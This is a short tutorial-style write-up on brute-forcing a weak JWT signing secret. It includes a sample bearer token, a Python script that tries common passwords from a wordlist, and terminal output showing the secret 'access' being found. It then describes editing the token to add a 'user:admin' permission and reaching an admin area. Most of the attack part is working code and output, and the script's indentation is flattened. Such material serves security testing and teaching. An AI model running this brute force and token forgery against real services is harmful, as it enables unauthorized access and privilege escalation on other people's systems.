JWT Secret Key Brute Force
JSON Web Token is a compact mechanism used for transferring claims between two parties. These are generally represented as JSON objects and can be signed to protect the integrity of the underlying message using a Message Authentication Code (MAC) and/or encrypted. The mechanism followed by JWTs is governed by the standard RFC7519. A JSON Web Token [JWT] consists of three parts; an encoded Header, an encoded Payload and the Signature. If weak keys are used, it could be possibly found using brute force.
A jwt token can be taken which is given by the API
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDc2MjA2LCJleHAiOjE2MDkyNDkwMDYsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.gntpp9iRzVtYn1eZNwnvHPp-NaD15AgBDb4Ovti8r7w
A modified script of json_web_tokens.py can be used with the following wordlist 10k-most-common.txt
#!/usr/bin/python
import jwt;
from termcolor import colored
print (colored("Script to brute-force JWT secret token",'white'))
encoded = input("Enter encoded payload: ")
with open('secret.txt') as secrets:
for secret in secrets:
try:
payload = jwt.decode(encoded, secret.rstrip(), algorithms=['HS256'])
print (colored('Success! Token decoded with ....[' + secret.rstrip() + ']','green'))
break
except jwt.InvalidTokenError:
print (colored('Invalid Token .... [' + secret.rstrip() + ']','red'))
except jwt.ExpiredSignatureError:
print (colored('Token Expired ....[' + secret.rstrip() + ']','red'))
By running the script, the secret key can be found.
💻️ 📂️ 🍣 master 📝 ×1🛤️ ×1via 🐍 v2.7.17 ✗ python3 brute-jwt.py
Script to brute-force JWT secret token
Enter encoded payload: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDc2MjA2LCJleHAiOjE2MDkyNDkwMDYsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.gntpp9iRzVtYn1eZNwnvHPp-NaD15AgBDb4Ovti8r7w
Invalid Token .... [password]
Invalid Token .... [123456]
Invalid Token .... [12345678]
Invalid Token .... [1234]
Invalid Token .... [qwerty]
Invalid Token .... [12345]
Invalid Token .... [dragon]
Invalid Token .... [pussy]
Invalid Token .... [baseball]
Invalid Token .... [football]
Invalid Token .... [letmein]
Invalid Token .... [monkey]
Invalid Token .... [696969]
Invalid Token .... [abc123]
Invalid Token .... [mustang]
Invalid Token .... [michael]
Invalid Token .... [shadow]
Invalid Token .... [master]
Invalid Token .... [jennifer]
Invalid Token .... [111111]
Invalid Token .... [2000]
Invalid Token .... [jordan]
Invalid Token .... [superman]
Invalid Token .... [harley]
Invalid Token .... [1234567]
Invalid Token .... [fuckme]
Invalid Token .... [hunter]
Invalid Token .... [fuckyou]
Invalid Token .... [trustno1]
Invalid Token .... [ranger]
Invalid Token .... [buster]
Invalid Token .... [thomas]
Invalid Token .... [tigger]
Invalid Token .... [robert]
Invalid Token .... [soccer]
Invalid Token .... [fuck]
Invalid Token .... [batman]
Invalid Token .... [test]
Invalid Token .... [pass]
Invalid Token .... [killer]
Invalid Token .... [hockey]
Invalid Token .... [george]
Invalid Token .... [charlie]
Invalid Token .... [andrew]
Invalid Token .... [michelle]
Invalid Token .... [love]
Invalid Token .... [sunshine]
Invalid Token .... [jessica]
Invalid Token .... [asshole]
Invalid Token .... [6969]
Invalid Token .... [pepper]
Invalid Token .... [daniel]
Success! Token decoded with ....[access]
https://www.jsonwebtoken.io/ can now be used to edit the token and "user:admin" permission can now be added.
This token can now be used access the admin area.
